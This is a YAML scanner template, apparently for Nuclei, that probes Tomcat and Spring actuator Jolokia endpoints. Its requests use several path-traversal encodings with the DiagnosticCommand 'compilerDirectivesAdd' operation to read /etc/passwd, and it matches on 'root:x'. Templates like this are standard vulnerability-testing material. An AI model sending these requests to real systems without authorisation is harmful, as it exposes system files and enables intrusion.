id: alias_tomcat_jolokia

info:
  name: Tomcat Jolokia Sensitive Endpoints Exposure (Traversal Expanded)
  author: Xand
  severity: medium
  description: Attempts to access sensitive Jolokia endpoints using multiple path traversal variations.
  metadata:
    max-request: 10
  tags: jolokia,tomcat,traversal,exposure

http:
  - method: GET
    path:
      # Normal endpoint
      - "{{BaseURL}}/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties"

      # Traversal variations
      - "{{BaseURL}}/..;/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/%5c../jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/..%2f..%2fjolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/%2e%2e/%2e%2e/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/..%2f;jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/%252e%252e/%252e%252e/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/..;/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
      - "{{BaseURL}}/%252e%252e/%252e%252e/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: or
        words:
          - "root:x"
          - "catalina.base="
